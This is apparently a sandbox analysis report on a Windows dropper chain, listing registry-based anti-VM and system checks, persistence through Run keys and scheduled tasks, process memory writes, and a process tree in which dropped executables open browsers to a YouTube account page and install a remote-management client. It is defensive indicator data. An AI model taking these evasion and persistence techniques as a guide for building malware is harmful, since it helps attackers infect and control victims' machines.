opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITSMAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITSMAgent.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 238 Go-http-client/1.1 -
Modifies data under HKEY_USERS 13 IoCs
Processes:
ITSMService.exepython_x86_Lib.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs ITSMService.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ITSMService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" python_x86_Lib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" python_x86_Lib.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" python_x86_Lib.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT ITSMService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates ITSMService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs ITSMService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ python_x86_Lib.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" python_x86_Lib.exe -
Modifies registry class 25 IoCs
Processes:
msiexec.exedropperrr.exefirefox.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30\DefaultFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Language = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061\07EFF3737FF5D2942A4FC0A6518D5D30 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\PackageCode = "D7076E96D3235814DB26ACC95D2BAD84" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings dropperrr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\PackageName = "em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductIcon = "C:\\Windows\\Installer\\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\\icon.ico" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Version = "151109272" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductName = "Endpoint Manager Communication Client" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\InstanceType = "0" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3308 schtasks.exe 7252 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
ITSMAgent.exeITSMAgent.exeITSMAgent.exepid process 7240 ITSMAgent.exe 2380 ITSMAgent.exe 4080 ITSMAgent.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exemsedge.exemsedge.exechrome.exec5d6d3a173.exeaxplong.exeRegAsm.exeaxplong.exeexplorti.exepureee.exeexplorti.exeaxplong.exechrome.exemsedge.exemsiexec.exepid process 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe 2144 explorti.exe 2144 explorti.exe 2508 msedge.exe 2508 msedge.exe 4644 msedge.exe 4644 msedge.exe 3076 chrome.exe 3076 chrome.exe 5680 c5d6d3a173.exe 5680 c5d6d3a173.exe 6328 axplong.exe 6328 axplong.exe 7128 RegAsm.exe 7128 RegAsm.exe 7128 RegAsm.exe 6176 axplong.exe 6176 axplong.exe 664 explorti.exe 664 explorti.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 7920 explorti.exe 7920 explorti.exe 7916 axplong.exe 7916 axplong.exe 6712 pureee.exe 6712 pureee.exe 8004 chrome.exe 8004 chrome.exe 7108 msedge.exe 7108 msedge.exe 7108 msedge.exe 7108 msedge.exe 8004 chrome.exe 8004 chrome.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6712 pureee.exe 6644 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exechrome.exepid process 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 3076 chrome.exe 3076 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exefirefox.exeRegAsm.exedescription pid process Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeDebugPrivilege 5064 firefox.exe Token: SeDebugPrivilege 5064 firefox.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeDebugPrivilege 7128 RegAsm.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe Token: SeCreatePagefilePrivilege 3076 chrome.exe Token: SeShutdownPrivilege 3076 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exemsedge.exefirefox.exechrome.exepid process 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exefirefox.exechrome.exepid process 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 4644 msedge.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 5064 firefox.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe 3076 chrome.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
firefox.exe84743dcfde.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exepid process 5064 firefox.exe 6056 84743dcfde.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 7240 ITSMAgent.exe 2380 ITSMAgent.exe 4080 ITSMAgent.exe 6896 ITSMService.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exe73b79a2459.execmd.exechrome.exemsedge.exefirefox.exefirefox.exedescription pid process target process PID 3892 wrote to memory of 2144 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe explorti.exe PID 3892 wrote to memory of 2144 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe explorti.exe PID 3892 wrote to memory of 2144 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe explorti.exe PID 2144 wrote to memory of 4824 2144 explorti.exe 73b79a2459.exe PID 2144 wrote to memory of 4824 2144 explorti.exe 73b79a2459.exe PID 2144 wrote to memory of 4824 2144 explorti.exe 73b79a2459.exe PID 4824 wrote to memory of 4836 4824 73b79a2459.exe cmd.exe PID 4824 wrote to memory of 4836 4824 73b79a2459.exe cmd.exe PID 4836 wrote to memory of 3076 4836 cmd.exe chrome.exe PID 4836 wrote to memory of 3076 4836 cmd.exe chrome.exe PID 4836 wrote to memory of 4644 4836 cmd.exe msedge.exe PID 4836 wrote to memory of 4644 4836 cmd.exe msedge.exe PID 4836 wrote to memory of 3136 4836 cmd.exe firefox.exe PID 4836 wrote to memory of 3136 4836 cmd.exe firefox.exe PID 3076 wrote to memory of 4004 3076 chrome.exe chrome.exe PID 3076 wrote to memory of 4004 3076 chrome.exe chrome.exe PID 4644 wrote to memory of 1020 4644 msedge.exe msedge.exe PID 4644 wrote to memory of 1020 4644 msedge.exe msedge.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 3136 wrote to memory of 5064 3136 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe PID 5064 wrote to memory of 4940 5064 firefox.exe firefox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D997.tmp\D998.tmp\D999.bat C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa1279cc40,0x7ffa1279cc4c,0x7ffa1279cc586⤵PID:4004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1928 /prefetch:26⤵PID:4732
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2140 /prefetch:36⤵PID:4544
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2268 /prefetch:86⤵PID:3248
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3164 /prefetch:16⤵PID:5388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3300 /prefetch:16⤵PID:5400
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=220,i,2466662330440772873,14513629541099201731,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3704 /prefetch:86⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:8004 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa126546f8,0x7ffa12654708,0x7ffa126547186⤵PID:1020
-
